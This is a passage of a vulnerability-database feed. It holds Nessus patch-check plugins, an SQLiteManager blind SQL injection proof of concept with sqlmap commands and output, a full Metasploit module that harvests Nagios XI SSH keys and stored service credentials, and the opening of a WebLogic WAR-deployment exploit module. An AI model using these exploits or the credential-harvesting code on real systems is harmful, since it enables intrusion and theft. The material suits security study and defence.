\"CVE-2019-6209\",\n \"CVE-2019-6210\",\n \"CVE-2019-6211\",\n \"CVE-2019-6213\",\n \"CVE-2019-6214\",\n \"CVE-2019-6218\",\n \"CVE-2019-6219\",\n \"CVE-2019-6220\",\n \"CVE-2019-6221\",\n \"CVE-2019-6224\",\n \"CVE-2019-6225\",\n \"CVE-2019-6230\",\n 
\"CVE-2019-6231\",\n \"CVE-2019-6235\"\n );\n script_bugtraq_id(106323, 106693, 106694);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-1-22-2\");\n\n script_name(english:\"macOS 10.14.x < 10.14.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is\n10.14.x prior to 10.14.3. It is, therefore, affected by multiple\nvulnerabilities related to the following components:\n\n - AppleKeyStore\n - Bluetooth\n - Core Media\n - CoreAnimation\n - FaceTime\n - IOKit\n - Kernel\n - libxpc\n - Natural Language Processing\n - QuartzCore\n - SQLite\n - WebRTC\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209446\");\n # https://lists.apple.com/archives/security-announce/2019/Jan/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a77b9bea\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.14.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6218\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nfix = \"10.14.3\";\nminver = \"10.14\";\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\n\nif (ver_compare(ver:version, minver:minver, fix:fix, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:34:49", 
"bulletinFamily": "scanner", "description": "Due to a large number of issues discovered in GhostScript that prevent\nit from being used by ImageMagick safely, this update includes a\ndefault policy change that disables support for the Postscript and PDF\nformats in ImageMagick. This policy can be overridden if necessary by\nusing an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling\ncertain images in ImageMagick. An attacker could use this to cause a\ndenial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436,\nCVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a\nvariable before using it when processing MAT images. An attacker could\nuse this to cause a denial of service or possibly execute arbitrary\ncode. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed\nin ImageMagick when processing XBM images. An attacker could use this\nto expose sensitive information. (CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed in\nImageMagick when handling certain images. An attacker could use this\nto cause a denial of service or possibly execute arbitrary code.\n(CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors\nin some situations. An attacker could use this to cause a denial of\nservice. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image\nmeta data in some situations. An attacker could use this to cause a\ndenial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory\nallocation when handling certain image types. An attacker could use\nthis to cause a denial of service. 
(CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick\ndid not properly check for NULL in some situations when processing PNG\nimages. An attacker could use this to cause a denial of service.\n(CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. Unfortunately, the\nfix for CVE-2017-13144 introduced a regression in ImageMagick in\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix for\nCVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3785-1.NASL", "href": "https://www.tenable.com/plugins/nessus/117935", "published": "2018-10-05T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : imagemagick vulnerabilities (USN-3785-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3785-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117935);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2017-13144\", \"CVE-2018-14434\", \"CVE-2018-14435\", \"CVE-2018-14436\", \"CVE-2018-14437\", \"CVE-2018-14551\", \"CVE-2018-16323\", \"CVE-2018-16640\", \"CVE-2018-16642\", \"CVE-2018-16643\", \"CVE-2018-16644\", \"CVE-2018-16645\", \"CVE-2018-16749\", \"CVE-2018-16750\");\n script_xref(name:\"USN\", value:\"3785-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : imagemagick vulnerabilities (USN-3785-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Due to a large number of issues discovered in GhostScript that prevent\nit from being used by ImageMagick safely, this update includes a\ndefault policy change that disables support for the Postscript and PDF\nformats in ImageMagick. This policy can be overridden if necessary by\nusing an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling\ncertain images in ImageMagick. An attacker could use this to cause a\ndenial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436,\nCVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a\nvariable before using it when processing MAT images. An attacker could\nuse this to cause a denial of service or possibly execute arbitrary\ncode. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed\nin ImageMagick when processing XBM images. An attacker could use this\nto expose sensitive information. 
(CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed in\nImageMagick when handling certain images. An attacker could use this\nto cause a denial of service or possibly execute arbitrary code.\n(CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors\nin some situations. An attacker could use this to cause a denial of\nservice. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image\nmeta data in some situations. An attacker could use this to cause a\ndenial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory\nallocation when handling certain image types. An attacker could use\nthis to cause a denial of service. (CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick\ndid not properly check for NULL in some situations when processing PNG\nimages. An attacker could use this to cause a denial of service.\n(CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. Unfortunately, the\nfix for CVE-2017-13144 introduced a regression in ImageMagick in\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix for\nCVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3785-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick-6.q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++-6.q16-5v5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++-6.q16-7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-3-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore5-extra\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"imagemagick\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagick++5\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagickcore5\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagickcore5-extra\", pkgver:\"8:6.7.7.10-6ubuntu3.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagick++-6.q16-5v5\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagickcore-6.q16-2\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagickcore-6.q16-2-extra\", pkgver:\"8:6.8.9.9-7ubuntu5.13\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"imagemagick\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libmagick++-6.q16-7\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libmagickcore-6.q16-3\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libmagickcore-6.q16-3-extra\", pkgver:\"8:6.9.7.4+dfsg-16ubuntu6.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"imagemagick / imagemagick-6.q16 / libmagick++-6.q16-5v5 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-04T20:03:02", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-28T00:00:00", "published": "2019-08-28T00:00:00", "id": "1337DAY-ID-33164", "href": "https://0day.today/exploit/description/33164", "title": "SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection Vulnerability", "type": "zdt", "sourceData": "<!--\r\n# Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)\r\n# Exploit Author: Rafael Pedrero\r\n# Vendor Homepage: http://www.sqlitemanager.org/\r\n# Software Link: http://www.sqlitemanager.org/\r\n# Version: SQLiteManager 1.2.0 (and 1.2.4)\r\n# Tested on: All\r\n# CVE : CVE-2019-9083\r\n# Category: webapps\r\n\r\n\r\n1. Description\r\n\r\nSQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php\r\ndbsel parameter. NOTE: This product is discontinued.\r\n\r\n\r\n2. 
Proof of Concept\r\n\r\nDetect:\r\nhttp://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2072\r\nhttp://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2070\r\n\r\nSave the next post in a file: sqli.txt\r\n\r\nPOST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1\r\nContent-Length: 191\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nCookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;\r\nSQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;\r\nSQLiteManager_fullText=0; SQLiteManager_HTMLon=0\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;\r\nTrident/5.0)\r\n\r\naction=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1\r\n\r\n$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all\r\n\r\n[11:58:27] [INFO] resuming back-end DBMS 'sqlite'\r\n[11:58:27] [INFO] testing connection to the target URL\r\nsqlmap resumed the following injection point(s) from stored session:\r\n---\r\nParameter: dbsel (GET)\r\n Type: boolean-based blind\r\n Title: OR boolean-based blind - WHERE or HAVING clause\r\n Payload: dbsel=-4019 OR 7689=7689\r\n---\r\n[11:58:27] [INFO] the back-end DBMS is SQLite\r\nweb server operating system: Windows\r\nweb application technology: PHP X.X.X, Apache 2.X.X\r\nback-end DBMS: SQLite\r\n[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases\r\nnow\r\n[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'\r\n[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'\r\n[11:58:27] [WARNING] reflective value(s) found and filtering out\r\n[11:58:27] [WARNING] running in a single-thread mode. 
Please consider usage\r\nof o\r\nption '--threads' for faster data retrieval\r\n[11:58:27] [INFO] retrieved: 5\r\n[11:58:27] [INFO] retrieved: database\r\n[11:58:28] [INFO] retrieved: user_function\r\n[11:58:30] [INFO] retrieved: attachment\r\n[11:58:31] [INFO] retrieved: groupes\r\n[11:58:32] [INFO] retrieved: users\r\n.....\r\n.....\r\n.....\r\n\r\n\r\n3. Solution:\r\n\r\nThe product is discontinued. Update to last version.\r\n-->\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33164"}], "metasploit": [{"lastseen": "2019-11-27T18:40:05", "bulletinFamily": "exploit", "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials, creating opportunities for lateral movement.\n", "modified": "2019-10-10T21:57:49", "published": "2019-07-27T17:22:58", "id": "MSF:POST/LINUX/GATHER/ENUM_NAGIOS_XI", "href": "", "type": "metasploit", "title": "Nagios XI Enumeration", "sourceData": " ##\n # This module requires Metasploit: https://metasploit.com/download\n # Current source: https://github.com/rapid7/metasploit-framework\n ##\n\n class MetasploitModule < Msf::Post\n include Msf::Post::Linux::System\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Nagios XI Enumeration',\n 'Description' => %q{\n NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Cale Smith', # @0xC413\n ],\n 'DisclosureDate' => 'Apr 17 2018',\n 'Platform' => 'linux',\n 'SessionTypes' => ['shell', 'meterpreter'],\n }\n ))\n register_options([\n OptString.new('DB_ROOT_PWD', [true, 'Password for DB root user, an option if they change this', 'nagiosxi' ])\n ])\n end\n\n # save found creds in the MSF DB for easy use\n def report_obj(cred, login)#, login)\n return if cred.nil? 
|| login.nil?\n credential_data = {\n origin_type: :session,\n post_reference_name: self.fullname,\n session_id: session_db_id,\n workspace_id: myworkspace_id,\n\n }.merge(cred)\n credential_core = create_credential(credential_data)\n\n login_data = {\n core: credential_core,\n workspace_id: myworkspace_id\n }.merge(login)\n\n create_credential_login(login_data)\n end\n\n #parse out domain realm for windows services\n def parse_realm(username)\n userealm=username.split('/')\n\n if userealm.count>1\n realm = userealm[0]\n username = userealm[1]\n\n credential_data={\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: realm,\n username: username\n }\n else\n credential_data={\n username: username\n }\n\n end\n\n return credential_data\n end\n\n def run\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n @creds = []\n @ssh_keys = []\n\n #get nagios SSH private key\n id_rsa_path = '/home/nagios/.ssh/id_rsa'\n if file?(id_rsa_path)\n print_good('Attempting to grab Nagios SSH key')\n ssh_key = read_file(id_rsa_path)\n ssh_key_loot = store_loot(\n 'nagios_ssh_priv_key',\n 'text/plain',\n session,\n ssh_key,\n nil\n )\n print_status(\"Nagios SSH key stored in #{ssh_key_loot}\")\n else\n print_status('No SSH key found')\n end\n\n print_status('Attempting to dump Nagios DB')\n db_dump_file = \"/tmp/#{Rex::Text.rand_text_alpha(6)}\"\n\n sql_query = %Q|mysql -u root -p#{datastore['DB_ROOT_PWD']} -e \"|\n sql_query << %Q|SELECT nagios_services.check_command_object_id, nagios_hosts.address, REPLACE(nagios_services.check_command_args,'\\\\\"','%22') FROM nagios.nagios_hosts |\n sql_query << %Q|INNER JOIN nagios.nagios_services on nagios_hosts.host_object_id=nagios_services.host_object_id |\n sql_query << %Q|INNER JOIN nagios.nagios_commands on nagios_commands.object_id = nagios_services.check_command_object_id |\n sql_query << %Q|WHERE nagios_services.check_command_object_id!=89 |\n sql_query << %Q|ORDER BY 
nagios_services.check_command_object_id |\n sql_query << %Q|INTO OUTFILE '#{db_dump_file}' FIELDS TERMINATED BY ',' ENCLOSED BY '\\\\\"' LINES TERMINATED BY '\\\\n' ;\"|\n\n out = cmd_exec(sql_query)\n if out.match(/error/i)\n print_error(\"Could not get DB contents: #{out.gsub(/\\n/, ' ')}\")\n return\n else\n db_dump = read_file(db_dump_file)\n print_good('Nagios DB dump successful')\n # store raw db results, there is likely good stuff in here that we don't parse out\n db_loot = store_loot(\n 'nagiosxi_raw_db_dump',\n 'text/plain',\n session,\n db_dump,\n nil\n )\n print_status(\"Raw Nagios DB dump #{db_loot}\")\n print_status(\"Look through the DB dump manually. There could be\\ some good loot we didn't parse out.\")\n end\n\n CSV.parse(db_dump) do |row|\n case row[0]\n when \"110\" #WMI\n host = row[1]\n creds = row[2].split('!')\n username = creds[0].match(/'(.*?)'/)[1]\n password = creds[1].match(/'(.*?)'/)[1]\n\n user_credential_data = parse_realm(username)\n\n credential_data = {\n private_data: password,\n private_type: :password,\n }.merge(user_credential_data)\n\n login_data = {\n address: host,\n port: 135,\n service_name: 'WMI',\n protocol: 'tcp',\n }\n\n when \"59\" #SSH\n host = row[1]\n\n credential_data = {\n username: 'nagios',\n private_data: ssh_key,\n private_type: :ssh_key\n }\n\n login_data = {\n address: host,\n port: 22,\n service_name: 'SSH',\n protocol: 'tcp',\n }\n\n when \"25\" #FTP\n host = row[1]\n creds = row[2].split('!')\n username = creds[0]\n password = creds[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 21,\n service_name: 'FTP',\n protocol: 'tcp',\n }\n\n when \"67\" #MYSQL\n host = row[1]\n username=row[2].match(/--username=(.*?)\\s/)[1]\n password=row[2].match(/--password=%22(.*?)%22/)[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: 
host,\n port: 3306,\n service_name: 'MySQL',\n protocol: 'tcp',\n }\n\n when \"66\" #MSSQL\n host = row[1]\n username=row[2].match(/-U '(.*?)'/)[1]\n password=row[2].match(/-P '(.*?)'/)[1]\n\n user_credential_data = parse_realm(username)\n credential_data = {\n private_data: password,\n private_type: :password,\n }.merge(user_credential_data)\n\n login_data = {\n address: host,\n port: 1433,\n service_name: 'MSSQL',\n protocol: 'tcp',\n }\n\n when \"76\" #POSTGRES\n host = row[1]\n username=row[2].match(/--dbuser=(.*?)\\s/)[1]\n password=row[2].match(/--dbpass=%22(.*?)%22/)[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 5432,\n service_name: 'PostgreSQL',\n protocol: 'tcp',\n }\n\n when \"85\" #SNMP\n host = row[1]\n creds = row[2].split('!')\n password = ' '\n username = creds[0]\n port = 161\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 161,\n service_name: 'SNMP',\n protocol: 'udp',\n }\n\n when \"88\" #LDAP\n host = row[1]\n username = row[2].match(/-D %22(.*?)%22/)[1]\n password = row[2].match(/-P %22(.*?)%22/)[1]\n\n credential_data = {\n username: username,\n private_data: password,\n private_type: :password,\n }\n\n login_data = {\n address: host,\n port: 389,\n service_name: 'LDAP',\n protocol: 'tcp',\n }\n else\n #base case\n end\n unless credential_data.nil? 
|| login_data.nil?\n report_obj(credential_data, login_data)\n end\n end\n\n\n print_status(\"Run 'creds' to see credentials loaded into the MSF DB\")\n\n #cleanup db dump\n register_file_for_cleanup(db_dump_file)\n end\n end\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/enum_nagios_xi.rb"}, {"lastseen": "2019-11-30T10:27:56", "bulletinFamily": "exploit", "description": "This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a \"oats\" account that you could log in with, which grants you administrator access.\n", "modified": "2019-05-24T15:06:47", "published": "2019-05-10T18:27:08", "id": "MSF:EXPLOIT/WINDOWS/HTTP/OATS_WEBLOGIC_CONSOLE", "href": "", "type": "metasploit", "title": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',\n 'Description' => %q{\n This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. 
Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Steven Seeley', # Used the trick and told me about it\n 'sinn3r' # Metasploit module\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'WebLogic Server Administration Console 12 or prior', { } ]\n ],\n 'References' =>\n [\n # The CVE description matches what this exploit is doing, but it was for version\n # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.\n # ['CVE', '2007-2699']\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8088\n },\n 'Notes' =>\n {\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 13 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),\n OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),\n OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])\n ])\n\n register_advanced_options(\n [\n OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 